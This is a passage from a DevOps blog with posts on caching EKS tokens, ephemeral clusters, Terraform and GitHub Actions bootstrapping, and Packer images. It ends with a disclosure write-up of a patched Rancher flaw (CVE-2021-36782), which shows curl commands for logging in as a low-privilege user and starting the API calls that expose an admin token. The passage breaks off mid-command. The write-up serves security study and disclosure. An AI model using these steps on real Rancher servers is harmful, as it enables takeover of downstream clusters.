FeaX's Blog

Speed up kubectl commands (and k9s) when using AWS

marco — Tue, 04 Feb 2025 15:31:45 GMT

AWS runs the AWS-CLI every time you run a command using kubectl. It's in your kubeconfig file. I started to notice it and came up with this script to bypass the slow AWS CLI.

#!/usr/bin/env bash
set -euo pipefail

# Build an array of non-flag arguments by iterating over all arguments.
# For any argument starting with "--" that does NOT include "=",
# skip that argument and (if available) its immediate next value.
args=("$@")
nonflag_args=()
i=0
while [ $i -lt "${#args[@]}" ]; do
    arg="${args[$i]}"
    if [[ "$arg" == --* ]]; then
        # If the flag is provided in the form "--flag=value", treat it as one argument.
        if [[ "$arg" != *=* ]]; then
            # Skip this flag and its following value (if any).
            i=$((i+2))
            continue
        fi
    else
        nonflag_args+=("$arg")
    fi
    i=$((i+1))
done

# Check if the first two non-flag arguments are "eks" and "get-token".
if [[ "${nonflag_args[0]:-}" != "eks" || "${nonflag_args[1]:-}" != "get-token" ]]; then
    exec aws "$@"
fi

# Extract the --cluster-name value from the arguments (supports both forms).
CLUSTER_NAME=""
for (( i=0; i < ${#args[@]}; i++ )); do
    case "${args[$i]}" in
        --cluster-name)
            if (( i+1 < ${#args[@]} )); then
                CLUSTER_NAME="${args[$((i+1))]}"
            fi
            ;;
        --cluster-name=*)
            CLUSTER_NAME="${args[$i]#--cluster-name=}"
            ;;
    esac
done

if [[ -z "$CLUSTER_NAME" ]]; then
    echo "Error: --cluster-name not provided." >&2
    exit 1
fi

# Set up the cache directory and file.
CACHE_DIR="${HOME}/.aws/kubetokencache"
CACHE_FILE="${CACHE_DIR}/${CLUSTER_NAME}.json"

# Check if a cached token exists and is valid for at least 30 seconds.
if [[ -f "$CACHE_FILE" ]]; then
    # Extract the expirationTimestamp using jq.
    EXPIRATION=$(jq -r '.status.expirationTimestamp // empty' "$CACHE_FILE")
    if [[ -n "$EXPIRATION" ]]; then
        # Convert the expiration timestamp (ISO 8601) to epoch seconds.
        exp_epoch=$(date -d "$EXPIRATION" +%s 2>/dev/null || date -j -f "%Y-%m-%dT%H:%M:%SZ" "$EXPIRATION" "+%s")
        now_epoch=$(date +%s)
        # If the token remains valid for at least another 30 seconds, output the cached file.
        if (( exp_epoch - now_epoch > 30 )); then
            cat "$CACHE_FILE"
            exit 0
        fi
    fi
fi

# No valid cached token found; run the actual AWS CLI command.
TOKEN_JSON=$(aws "$@")

# Create the cache directory if it doesn't exist.
mkdir -p "$CACHE_DIR"

# Cache the new token.
echo "$TOKEN_JSON" > "$CACHE_FILE"

# Output the token.
echo "$TOKEN_JSON"

Isolating DevOps changes using ephemeral infra environments

marco — Fri, 27 Sep 2024 20:56:04 GMT

Most companies have a production and testing environment for development. Both are used daily by developers and users. Platform or DevOps engineers often also use these test environments, and their work can break that environment due to faulty changes. Some companies schedule these changes "outside of working hours." Which is horrible for the people working on those changes.

For the application developers, it's normal to create a branch, write some code, and push it to git to be presented with an ephemeral environment—an instance of the application made just in time for you.

In your application instance, you click around and make some API calls. All without interacting with the production environment because you're in the test environment. Your code is doing fine, but suddenly, API calls fail randomly or even stop responding altogether. After debugging for a few minutes, you figure out that someone in the DevOps team is also working on some changes, breaking the test cluster.

The Kubernetes ingress controller needs an update, and just like your own code, the changes don't always work immediately. Your colleagues next to you are all hitting the F5 button like there is no tomorrow. The Slack channel gets pinged: "Cluster down??"

This situation happens more than DevOps'ers like to admit. Although you're testing it on the test cluster, it is production to the company. The solution is easy: yet another cluster, right? Prod, test, validation? Like a DevOps test cluster? If a DevOps test cluster exists, will only one person work on stuff?

What if I told you there was an elegant solution?

The idea

Having DevOps' ephemeral environments means you can create and destroy clusters whenever you're working on something as a DevOps'er, just like the developers do. This creates a safe environment for you to experiment with and test changes to the infrastructure.

Test is a production cluster

When a cluster can't be deleted, it's production to someone, and that someone is affected when you kill it off or play around with it. This means that when the DevOps guy wrecks a test cluster that prevents anyone from working, you accidentally break a cluster that was production to you.

Hand-sculpting a beautifully unstable cluster

When creating ephemeral clusters, it is important to reimagine how your production clusters exist. These clusters shouldn't be hand-sculpted masterpieces of art; instead, they should be easily copied or reproduced like printouts. Adding pieces to your infrastructure piece by piece can cause your blueprint to become unstable. When the time comes for you to rebuild your testing or production cluster, it will no longer be possible to build it up without taking hours to figure out what is wrong. Even worse, you aren't used to creating new clusters.

Then there is ClickOps'ing and Ninja'ing, which create unpredictable behavior, something we don't want in production. There is no record of change, and nobody remembers what happened three days ago.

Therefore, it's essential to be able to spin up a replica of that production cluster whenever you need it and throw it away when you're heading home.

Cluster generation with PRs

When you start working on something—an update to a controller, for example—you should do this on a cluster that is as close to production as possible. Testing in production doesn't fly for infrastructure, so you need a copy. Let's take a look at the options:

Production: Impacts customers
Testing: Impacts developer colleagues
Persistent validation: Impacts DevOps colleagues and is expensive
Ephemeral validation: Impacts only you

Now, this isn't easily done. Converting your blueprint to roll out 2+n clusters will require changes. Your blueprints might also require manual steps like allocating external resources (active directory, cloud resources, names, etc.). However, the biggest problem you will probably have is reproducibility.

The most important aspect of using ephemeral cluster generation is having a reproducible cluster. Whenever a PR is opened for infra, the environment should be built up and destroyed automatically when it is closed. Manual interventions make starting up a new cluster annoying and should be avoided entirely. You don't want to write a guide on how this mechanism works because of the shortcuts you took. It should work without explanation.

Cluster upgrade testing

Having the ability to generate clusters brings another great feature. Upgrade tests mean that you're running a pipeline on your ephemeral environment, which:

Destroys your cluster completely
Builds it back up from the main branch
Runs the test suite of the main branch to verify it's working correctly
Starts the upgrades of the cluster to your branch in one go
Runs the test suite of your branch

Using such a workflow ensures that your changes will work on the clusters currently running the main branch.

The most obvious scenario for this is updating the cluster, whether it's something like Crossplane or Kubernetes itself.

Example scenario

You could run into dependency constraints whenever you're building a new feature. For example, Crossplane creates its CRDs, not through ArgoCD reading the Helm chart. This can work when you're slowly building your change:

Add Crossplane to your setup
1. Crossplane creates the Provider CRD
You add the S3 AWS provider

But what if you merge this as one run into production?

ArgoCD adds Crossplane and the S3 AWS Provider to your setup
1. ArgoCD fails to dry-run Helm because it doesn't know the Provider CRD

By running an upgrade test, you would have found this flaw early.

This is one of the most confidence-creating features of having DevOps' ephemeral environments.

Cost control

Running additional environments isn't free. When you're working on something, a complete extra cluster will be created, and you'll pay for the resources you use. It's essential to keep track of the costs of these environments.

Track costs

If you're in AWS or any other cloud that uses the pay-per-minute model, you can put the resources in a separate group. This can be done using tags or separate accounts (which is also nice for security). Set budgets and notifications when running over your budget to ensure you don't run into a $10.000 bill just for some runaway controller creating hundreds of RDS databases.

Shut down the environment

The ability to start environments whenever you want also allows you to delete environments you're not currently working on. For example, when you're heading home every noon, you can shut down the environment to save costs. It takes time for your environment to become ready, so you will probably not shut it down for a bathroom break.

This also allows you to keep testing if your new changes will break cluster generation due to a circular dependency.

Disable features

Some things are outside the cluster's operational scope. For example, our audit logs in CloudWatch made up half of the costs of our validation account.

You can also run all nodes on spot, which is good practice for your testing and production environment, too. It's free chaos engineering, but make sure the application keeps working. All of our nodes have a 24-hour expiration date, which continuously tests node disruptions.

Of course, you can do a lot more but prevent drifting away too much from production by using a different blueprint for validation.

Nuke it

Good practice can also be to clean up everything in your account. I use aws-nuke for this. Every Friday evening, resources not explicitly excluded from the nuking process are removed from the AWS account. This ensures you don't have leftover resources from experiments.

Conclusion

This is one of the most important technical things I've learned at my job last year at Alliander. They have this flow in place, and it works great. Now, I've implemented this flow at the company where I'm currently working, Viya, and I'm 100% in on this. I'll probably be writing about some technical stuff related to this workflow in the future.

Bootstrapping Terraform GitHub Actions for AWS

marco — Sun, 21 Jan 2024 19:33:41 GMT

In a journey to eliminate all clickops, I want to automate the deployment of the core of my AWS infra with GitHub Actions. To do this, I need to create the IDP, IAM roles, the S3 bucket for the state, and the DynamoDB table for locking.

Terraform uses these, so it's a bit like the chicken and egg problem.

In this post, I will make Terraform manage its dependencies and connect GitHub Actions to AWS.

Bootstrapping the basics

Let's set up a skeleton for our Terraform configuration. The goal is to be able to:

Create the requirements for a remote state from Terraform
Authenticate to AWS using OIDC
Run Terraform in GitHub Actions

Creating the S3 and DynamoDB Terraform

Terraform uses S3 for its state and a DynamoDB table to prevent simultaneous runs. These do not exist already, and we don't want to create them by hand. This is why the first module I created in my AWS Core Terraform config repository is remote-state. This module has to be bootstrapped, and the state must eventually be migrated to the created S3 bucket.

This module is responsible for creating the needed resources and generating the backend.tf file.

To set up the required components, I used the following Terraform code:

resource "random_id" "tfstate" {
  byte_length = 8
}

resource "aws_s3_bucket" "terraform_state" {
  bucket = "tfstate-${random_id.tfstate.hex}"

  lifecycle {
    prevent_destroy = true
  }
}

resource "aws_s3_bucket_versioning" "terraform_state" {
  bucket = aws_s3_bucket.terraform_state.id

  versioning_configuration {
    status = "Enabled"
  }
}

resource "aws_dynamodb_table" "terraform_state_lock" {
  name         = "app-state-${random_id.tfstate.hex}"
  hash_key     = "LockID"
  billing_mode = "PAY_PER_REQUEST"

  attribute {
    name = "LockID"
    type = "S"
  }
}

remote-state module

To make the bucket name unique, I created a random ID, which is eventually saved in the Terraform state and will not change on subsequent runs.

For the DynamoDB table, I've set it up using PAY_PER_REQUEST because Terraform will not use even one query per second, and provisioning anything will likely result in more costs.

The attribute we're setting is the LockID which Terraform needs.

Next, we need Terraform to create the backend.tf file after it creates its required components.

I created this short template as state-backend.tftpl:

terraform {
  backend "s3" {
    bucket         = "${bucket}"
    key            = "states/terraform.tfstate"
    encrypt        = true
    dynamodb_table = "${dynamodb_table}"
    region         = "${region}"
  }
}

state-backend.tftpl

The templatefile function can template this template.

resource "local_sensitive_file" "foo" {
  content = templatefile("${path.module}/state-backend.tftpl", {
    bucket         = aws_s3_bucket.terraform_state.id
    dynamodb_table = aws_dynamodb_table.terraform_state_lock.name
    region         = var.aws_region
  })
  filename = "${path.module}/../../backend.tf"
}

templatefile function

You can find the complete Terraform code here.

Bootstrapping the remote state

When we run the remote-state module, we see that Terraform is creating everything as we'd expect:

~$ terraform apply -target module.remote-state

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # module.remote-state.aws_dynamodb_table.terraform_state_lock will be created
  + resource "aws_dynamodb_table" "terraform_state_lock" {
      + arn              = (known after apply)
      + billing_mode     = "PAY_PER_REQUEST"
      + hash_key         = "LockID"
      + id               = (known after apply)
      + name             = (known after apply)
      + read_capacity    = (known after apply)
      + stream_arn       = (known after apply)
      + stream_label     = (known after apply)
      + stream_view_type = (known after apply)
      + tags_all         = (known after apply)
      + write_capacity   = (known after apply)

      + attribute {
          + name = "LockID"
          + type = "S"
        }
    }

  # module.remote-state.aws_s3_bucket.terraform_state will be created
  + resource "aws_s3_bucket" "terraform_state" {
      + acceleration_status         = (known after apply)
      + acl                         = (known after apply)
      + arn                         = (known after apply)
      + bucket                      = (known after apply)
      + bucket_domain_name          = (known after apply)
      + bucket_regional_domain_name = (known after apply)
      + force_destroy               = true
      + hosted_zone_id              = (known after apply)
      + id                          = (known after apply)
      + object_lock_enabled         = (known after apply)
      + policy                      = (known after apply)
      + region                      = (known after apply)
      + request_payer               = (known after apply)
      + tags_all                    = (known after apply)
      + website_domain              = (known after apply)
      + website_endpoint            = (known after apply)
    }

  # module.remote-state.aws_s3_bucket_versioning.terraform_state will be created
  + resource "aws_s3_bucket_versioning" "terraform_state" {
      + bucket = (known after apply)
      + id     = (known after apply)

      + versioning_configuration {
          + mfa_delete = (known after apply)
          + status     = "Enabled"
        }
    }

  # module.remote-state.local_sensitive_file.foo will be created
  + resource "local_sensitive_file" "foo" {
      + content              = (sensitive value)
      + directory_permission = "0700"
      + file_permission      = "0700"
      + filename             = "modules/remote-state/../../backend.tf"
      + id                   = (known after apply)
    }

  # module.remote-state.random_id.tfstate will be created
  + resource "random_id" "tfstate" {
      + b64_std     = (known after apply)
      + b64_url     = (known after apply)
      + byte_length = 8
      + dec         = (known after apply)
      + hex         = (known after apply)
      + id          = (known after apply)
    }

Plan: 5 to add, 0 to change, 0 to destroy.

Terraform apply

However, because we generated and placed the backend.tf file, we see a warning when running it the second time:

│ Error: Backend initialization required, please run "terraform init"
│ 
│ Reason: Initial configuration of the requested backend "s3"

To migrate the local state to the just created S3 bucket, we can use the following command:

~$ terraform init -migrate-state

Initializing the backend...
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous "local" backend to the newly configured "s3" backend. No existing state was found in the newly configured "s3" backend. Do you want to copy this state to the new "s3" backend?

  Enter "yes" to copy and "no" to start with an empty state.

  Enter a value: yes


Successfully configured the backend "s3"! Terraform will automatically
use this backend unless the backend configuration changes.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2
- Using previously-installed hashicorp/aws v4.37.0

Terraform has been successfully initialized!

After the migration, you should be able to rerun it without any expected changes:

~$ terraform apply -target module.remote-state
module.remote-state.random_id.tfstate: Refreshing state... [id=_q9zfFjtnUQ]
module.remote-state.aws_dynamodb_table.terraform_state_lock: Refreshing state... [id=app-state-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket_versioning.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.local_sensitive_file.foo: Refreshing state... [id=6a30000a63c0f6d2d5ef8be77cce05bdfc237df7]

No changes. Your infrastructure matches the configuration.

Terraform has compared your real infrastructure against your configuration and found no differences, so no changes are needed.

We have a remote state which we can use in GitHub Actions now 🎉

Setting up a GitHub Actions Pipeline for Terraform

Although it might seem the wrong way around, I want to set up a Terraform pipeline before configuring the authentication from GitHub Actions to AWS. By having a broken pipeline, we can test the configuration we will build more easily.

To start using GitHub actions, we create a directory .github/workflows and place a yaml file there. You can find mine here.

The workflow consists of two jobs: the plan job and the apply job. The hard requirements I have for this workflow are:

Run the plan job on every commit
Merging is only available if the plan succeeds
Run the apply job only on the main branch
Run the apply job only if there are changes
Require manual approval for the apply job to run
No use of access keys
Account ID not visible

Most of these are straightforward, and the comments in GitHub should explain enough. Some were more interesting.

Merging is only available if the plan succeeds

It's good practice to prevent pushes to the main branch. You can block pushes by using branch protection rules. I chose to:

Require a pull request before merging
Require conversation resolution before merging
Require linear history
Require deployments to succeed before merging
Do not allow bypassing the above settings

The most relevant options selected are options 1 and 4. These ensure everything will be funneled through a pull request only if the workflow succeeds.

Run the apply job only if there are changes

When you change things like placing comments, it will not change the outcome of the terraform plan. In that case, we can skip the apply step.

The Terraform setup wrapper sets a couple of outputs in GitHub Actions. The most interesting one for this requirement is the steps.plan.outputs.exitcode. This is set as an output in the plan job, and in the apply job, we can use it as a run condition.

  apply:
    runs-on: ubuntu-latest
    environment: production
    needs: plan
    if: |
      github.ref == 'refs/heads/main' &&
      needs.plan.outputs.returncode == 2

if using the main branch and changes are detected in the Terraform plan

Require manual approval for the `apply` job to run

A few GitHub bot scripts/actions allow you to open issues and place "LGTM!" comments to approve the next step: apply. I disliked how you use comments to approve steps, although it can be marked up nicely if you prefer this way.

GitHub allows you to review jobs that are in specific environments. To enable this, you open the settings tab in your repository and select Environments. You can add new environments if they are not already created automatically here. I created plan and apply.

Once they are created, you can enable the option Required reviewers and add yourself to the reviewers' list.

Configuring environments

Concluding the GitHub Action pipeline

Now, we can run Terraform from GitHub actions and check the plan before we apply! 🎉

We're also probably very happy to see the following error in the pipeline:

Assuming role with OIDC
Error: Could not assume role with OIDC: No OpenIDConnect provider found in your account for https://token.actions.githubusercontent.com

This means that not everyone can access our AWS account. Let's dive into establishing a trust relationship between AWS and GitHub Actions.

Terraform warns you that running plan and apply separately without writing a plan to file may change the actual apply. This is because when you don't write your plan to a file, you cannot be certain that by the time you approve your rollout to production, your AWS state will still be the same.

When you run the plan command with -out, you can make sure that the apply step only applies what you had planned if the state didn't change.

Trusting the GitHub repository using OIDC

We must add an identity provider (IDP) to our AWS account to establish trust. This cannot be done from the GitHub actions we created because it has no access yet.

Adding the identity provider to AWS using Terraform

To create the IDP, we can always use the same Terraform code:

resource "aws_iam_openid_connect_provider" "default" {
  url = "https://token.actions.githubusercontent.com"

  client_id_list = [
    "sts.amazonaws.com",
  ]

  thumbprint_list = ["1b511abead59c6ce207077c0bf0e0043b1382612"]
}

Identity provider in Terraform

I have followed this guide and placed the IDP here for this part. This allows GitHub to assume roles when the role trusts GitHub. The thumbprint_list contains GitHub's thumbprint and will always be the same.

Creating a role for Github to assume

Creating roles with Terraform consists of a lot of lines of code. You can read the whole config here. I will only discuss the trust policy here.

data "aws_iam_policy_document" "core_trusted_entities_policy_document" {
  statement {
    actions = ["sts:AssumeRoleWithWebIdentity"]

    principals {
      type        = "Federated"
      identifiers = [var.oidc_id_github]
    }

    condition {
      test     = "StringEquals"
      variable = "token.actions.githubusercontent.com:aud"
      values   = ["sts.amazonaws.com"]
    }

    condition {
      test     = "StringEquals"
      variable = "token.actions.githubusercontent.com:sub"
      values = [
        "repo:fe-ax/tf-aws:environment:plan",
        "repo:fe-ax/tf-aws:environment:apply"
      ]
    }
  }
}

Trust policy for GHA

A trust policy always needs to select a principal, which is a federated principal, since we're linking to GitHub.

Next, we must add a condition allowing GitHub to send requests for the AWS STS (Security Token Service) service.

Finally, we specify which environments can access this role. I chose not to split up the read/write roles of the plan/apply jobs, but it would be good practice to do this. Using the condition "StringEquals" will check against exact matches in one of the following values.

Applying the configuration

When everything is ready, we can locally run terraform apply to apply all the new additions and take the last step before running our GitHub Actions workflow successfully.

Testing the GitHub Actions workflow

The time has come to put everything to the test. First, push everything to a branch if you haven't already done so. Then, create a pull request from your branch to the main.

It should start running like this:

Running actions blocking merge

Showing the merge is blocked until the run is complete. After a couple of seconds, it should show:

Succeeded action allowing merge

Check your plan, followed by a squash and merge. Don't forget to delete the branch. Immediately after merging, another plan should start running, detecting changes and triggering the apply job. It should look like:

Check the plan again, approve the deployment, and 🎉GitHub Actions is managing its resources to be able to manage its resources!

Destroying everything

If you want to destroy everything again, you must remove the lifecycle_policy first, or Terraform will tell you you can't destroy anything.

The best route is to delete the backend.tf file and migrate the remote state to your local machine. This is needed because Terraform will be destroying its S3 state and DynamoDB lock table, losing your state in the middle of a run.

marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ rm backend.tf
marco@DESKTOP-2RFLM66:~/tf-aws-iam/terraform$ tf init -migrate-state

Initializing the backend...
Terraform has detected you're unconfiguring your previously set "s3" backend.
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous "s3" backend to the
  newly configured "local" backend. No existing state was found in the newly
  configured "local" backend. Do you want to copy this state to the new "local"
  backend? Enter "yes" to copy and "no" to start with an empty state.

  Enter a value: yes



Successfully unset the backend "s3". Terraform will now operate locally.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/aws v4.37.0
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.

Terraform migrate

When the state is back to your local machine. Just destroy everything using terraform destroy and everything will be completely removed.

Conclusion

I think using GitHub as a place to manage anything and everything that's in your account is the only way to go. Clickopsing results in rogue resources that cannot be managed.

Whenever I have clickopsed things in a testing account, I use the aws-nuke script to find and remove all leftover AWS resources.

Further enhancements could be added to this setup, like making sure that the plan job only has read-only access, and the apply job with read-write access can only be run from the main branch.

Versions used

Terraform 1.7.0

Creating a golden image with Packer

marco — Wed, 08 Mar 2023 22:00:49 GMT

Packer is a tool to automate the build process for machine images. I've started looking into Packer to generate a golden image. Using a golden image lets me quickly set up a fresh development environment without keeping the EC2 instance for long periods and thinking about configuration drift. Fixing an issue can be as easy as recreating the EC2 instance. Besides that, sharing your environment with others and experimenting with different setups is made easy.

The GitHub repo for this blog article can be found here.

Getting started

Building machine images for AWS can be a time-consuming and error-prone process, but with Packer, you can automate the entire process. Packer is a powerful tool that allows you to create golden images for your development environment with just a few simple steps:

Booting an existing AMI image
Running some commands over SSH
Shutting it down
Taking a snapshot
Creating an AMI from the snapshot
Cleaning up

It's that simple, but Packer will automate these simple tasks. You can also use Packer to build against multiple platforms and architectures, which can be helpful when running on AWS Graviton instances like the t4g and x86 like t3 or t3a.

I've gone to some lengths to create a separate role for Packer in AWS IAM. You can easily strip it out if you want to use your all-mighty admin user.

Installing Packer

As usual, with modern commercial tools, the installation is straightforward.

wget -O- https://apt.releases.hashicorp.com/gpg | gpg --dearmor | sudo tee /usr/share/keyrings/hashicorp-archive-keyring.gpg
echo "deb [signed-by=/usr/share/keyrings/hashicorp-archive-keyring.gpg] https://apt.releases.hashicorp.com $(lsb_release -cs) main" | sudo tee /etc/apt/sources.list.d/hashicorp.list
sudo apt update && sudo apt install packer

You can test Packer by running the following: packer version

IAM policy and role for Packer in AWS

If you don't want to create IAM policies and choose to use your own AWS account, you can skip this path. Using an IAM role is particularly effective when Packer runs from an EC2 instance. I used an IAM role rather than our admin user for security reasons. If we run Packer from our local machine, it will assume the IAM role we've created, which has limited permissions. This reduces the risk of accidental exposure of our AWS credentials.

While using an IAM group might seem more straightforward, it has some drawbacks. We'll need an IAM role if we eventually want to use EC2 to build EC2 images. Additionally, using an IAM role is more secure, as it allows us to limit the permissions of Packer to only what it needs. Packer also provides a chroot builder, which uses a continuously running machine. It should be faster and able to leverage the IAM role we're creating. This is out of the scope of this blog post, however.

We can find the needed IAM policy here. It gives a lot of privileges. I've read this article by Stefan Koch about reducing the privileges required but did not implement it here. Not implementing Stefan's way is quicker but breaks the least privileges principle. Imagine a pipeline running with these privileges and accidentally exposing its credentials. It's okay for development but not for production. Also, consider dedicating a specific AWS account to building AMIs if you have many of them.

Using Terraform to create IAM resources

We can easily manage and clean up the privileges handed out by leveraging infrastructure as code to create IAM resources. It also allows us to collaborate with others by using git, giving us version control. You can find the resulting Terraform config in my GitHub repository.

To gain the privileges needed to build images with Packer, we need a couple of Terraform IAM resources:

Dependency tree based on Terraform graph beautifier

According to Terraform:

The recommended approach to building AWS IAM policy documents within Terraform is the highly customizable aws_iam_policy_document data source.

That is a lot of resource blocks for just one IAM role. I created my current IAM policies by hand while playing with them, but now I have to clean them up.

To confirm deletion, enter the policy name in the text input field.

After cleaning up, I ran the Terraform module creating the visualized resources above. It also writes a file named: packer.pkrvar.hcl. I now have a packer user that can create AMIs for me. Controlled and managed by a Terraform config, written as code.

Preparing and validating Packer

We can now create the Packer build file. I called it aws-k3s.pkr.hcl, and you can find it in the GitHub repository.

The variables are read from the file Terraform just created (packer.pkrvar.hcl). If you skipped that part, you need to fill it in yourself like this:

packer_access_key = "my-access-key"
packer_secret_key = "my-secret-key"
packer_region     = "eu-central-1"
packer_role_arn   = "arn:aws:iam::123456789012:role/packer_role"

packer.pkrvar.hcl

The main Packer file refers to these variables in the source "amazon-ebs" "ubuntu" resource. This resource selects one of the builders, which can be found under the plugins section of the documentation. We're using the Amazon EC2 EBS builder for now.

Preparing images with provisioners

Most of the Packer setups use the Shell provisioner. This way, Packer runs a script on the template source machine over SSH, which differs from the cloud-init we'll later use to initialize an instance running this image.

For Ubuntu, it's essential to include the first line:

cloud-init status --wait

If you don't wait for it to finish, some files still being created during the post-first boot script runs will not be available, and things like APT can thus show issues. More about this here.

The current configuration only tests the build since the variable skip_create_ami is set to true. This is an important setting when testing, as it doesn't create an actual AMI after it's done. You can immediately set the variable skip_create_ami to false if you're not changing the provisioner.

You can check the Packer config by running the following:

marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer validate -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
The configuration is valid.
marco@DESKTOP:~/ebpf-xdp-dev/packer$ packer build -var-file=packer.pkrvar.hcl aws-k3s.pkr.hcl 
k3s.amazon-ebs.ubuntu: output will be in this color.

==> k3s.amazon-ebs.ubuntu: Prevalidating any provided VPC information
==> k3s.amazon-ebs.ubuntu: Prevalidating AMI Name: ebpf-xdp-dev-2023-01-30-17-54-28
    k3s.amazon-ebs.ubuntu: Found Image ID: ami-12a3456c325f02ab
==> k3s.amazon-ebs.ubuntu: Creating temporary keypair: packer_12r18272-21d6-f24f-fb33-bc4e2f50e00a
==> k3s.amazon-ebs.ubuntu: Creating temporary security group for this instance: packer_9217wegf9e-b58b-4acc-d18e-2b19ad93bc96
==> k3s.amazon-ebs.ubuntu: Authorizing access to port 22 from [0.0.0.0/0] in the temporary security groups...
==> k3s.amazon-ebs.ubuntu: Launching a source AWS instance...
    k3s.amazon-ebs.ubuntu: Adding tag: "Creator": "Packer"
    k3s.amazon-ebs.ubuntu: Adding tag: "Creator": "Packer"
    k3s.amazon-ebs.ubuntu: Instance ID: i-04db1b92a25d2ede6

You can change the variable skip_create_ami to true if everything is correct and rerun it. This will do an entire run. The longest time will be spent in the snapshotting phase, as can be seen in a timetable here:

00:00-00:00 - Prevalidation
00:00-00:01 - Creating keypair & security group
00:01-00:02 - Launching a source AWS instance
00:02-00:27 - Connected to SSH and running provisioning script
00:27-01:37 - Stopping the source instance
01:37-08:56 - Creating AMI (creating snapshot is included in this step)
08:56-09:13 - Cleaning up

Timetable for Packer run

As you can see, almost 80% of the time is spent waiting on AWS for the AMI to become ready. This is why it's recommended to use the skip_create_ami variable. Fast iterations of testing are necessary to reach your goal quickly, and with the chroot builder, the iterations could be even quicker.

Costs

Just like when stopping an EC2 instance, you have to pay a fee for saving EBS snapshots. This snapshot has to exist as long as you're holding on to that AMI. The costs for this are approximately $0.05 per GB per month.

For my single image of 8GB, I'll pay $0.62 per 31-day month.

Remember to set up AMI deprecation and deregistration if you're creating images on a schedule. $0.62 isn't much, but run this daily, and you'll pay $19.22 after a month.

This is just a little cheaper than holding on to a stopped EC2's EBS volume at $0.0952. However, that EC2 volume might be three to four times larger than the image we've created to prevent disk space issues while running.

Especially when using EBS type io2 instead of gp3, it can be much cheaper to throw the volume away and recreate it when needed, for example, during the auto-scaling of EC2 instances.

Final thoughts on Packer

After exploring Packer and the golden image principle, I am convinced this workflow is a valuable addition to my toolkit.

Using Packer and AMIs can help maintain consistency and improve collaboration in a project, especially when multiple team members are involved.

Another advantage of Packer and AMIs is the ability to quickly restore an instance to its original state in case of issues.

However, it's worth noting that starting an EC2 instance from scratch using an AMI can take longer than just starting an instance. In some cases, it may be more efficient to simply start and stop instances. Using a combination of both will give you the best of both worlds.

Write-up of CVE-2021-36782: Exposure of credentials in Rancher API

marco — Wed, 14 Dec 2022 12:45:34 GMT

It has been a while since the last post on my blog. In April, I found an issue in the Rancher software, which is used to provision and manage Kubernetes clusters. We're four months past a published patched version, and I wanted to do a little write-up. It's not advisable to follow along using a production cluster. I've put an easy way to launch a Rancher cluster with Terraform at the bottom to follow along.

Summary

The issue caused an important Kubernetes ServiceAccountToken, to be exposed to low-privileged users. The exposed token can access downstream clusters as admin. The vulnerability is considered critical and has received a 9.9 CVSS score, and they published it under this security advisory. On 7 April 2022, I sent a responsible disclosure of this issue, including a proof of concept, to Rancher. A quick confirmation of receipt was sent back 45 minutes later, and about 13 hours later, they sent confirmation of the issue and started working on a fix, which was very quick.

Hi Marco.

Thank you once again for reporting this issue directly to us and for the excellent PoC. This helped us to quickly evaluate and confirm the issue, which affects Rancher versions 2.6.4 and 2.5.12.

We started working on a fix and will release in the upcoming versions of Rancher. It will not be publicly announced until all supported Rancher versions are patched. We will communicate to you in advance before we release the latest fixed version.

Please let us know if you have any questions.

Thanks,

Rancher kept me up to date as time passed about the fix they were working on. On 19 August 2022, Rancher released a patched version, version 2.6.7.

In this blog article, I want to explain the vulnerability the best I can while providing a way to follow along.

The service account

Rancher uses Kubernetes service accounts to access other clusters. There are two relevant service accounts I want to talk about.

The first one is the Rancher user's token. A user created in Rancher gets a service account bound to specific roles granted on a particular cluster. Because it's bound to specific roles, it has limited privileges to what it can do.

For demonstration, I've created a user named "readonlyuser", and this is what it can do:

kubectl auth can-i --list

This user has access to Rancher's predefined role "view workloads" in the project "extraproject". Only one namespace is currently bound to this project, called "foo", meaning the user has almost no access and, therefore, doesn't see many objects in the Rancher dashboard.

This user uses his service account token to gain this access. Since a Rancher user normally would proxy API calls through Rancher's cluster router, the user doesn't see this service account token. When you download the kubeconfig file from the UI, you do see this token.

Rancher also uses a service account token for its kontainer-engine to manage the downstream clusters and gets this token from the API, as can be seen here:

rancher/manager.go at 9b2f2ae0e0d89f16580cd7767a52a6d9b5230fda · rancher/rancher

Complete container management platform. Contribute to rancher/rancher development by creating an account on GitHub.

GitHubrancher

This service account is just like the user's service account but is bound to the cluster-admin role and shouldn't be available to regular users.

Accessing Rancher's service account token

Rancher renders things using javascript and API calls from the browser. This is visible when you log into the Rancher dashboard and open the developer console. They've written dynamically generated forms and lists based on schemas. For example, Rancher has a view for workloads, and when you open it, it'll call the Kubernetes API for data to populate the view with the returned data.

One of the used API calls is /v1/management.cattle.io.cluster for information about the clusters the user can see. You can investigate this by opening the API path in the browser or immediately requesting the information using curl.

BASEURL="https://rancher.1...4.sslip.io"

# Request UI token, or create API token manually
TOKEN=$(curl -s -k -XPOST \
  -d '{"description":"UI session",\
  "responseType":"token", \
  "username":"readonlyuser", \
  "password":"readonlyuserreadonlyuser"}' \
  ${BASEURL}/v3-public/localProviders/local?action=login \
  | jq '.token' -r)

curl -s -k -XGET \
  -H "Authorization: Bearer $TOKEN" \
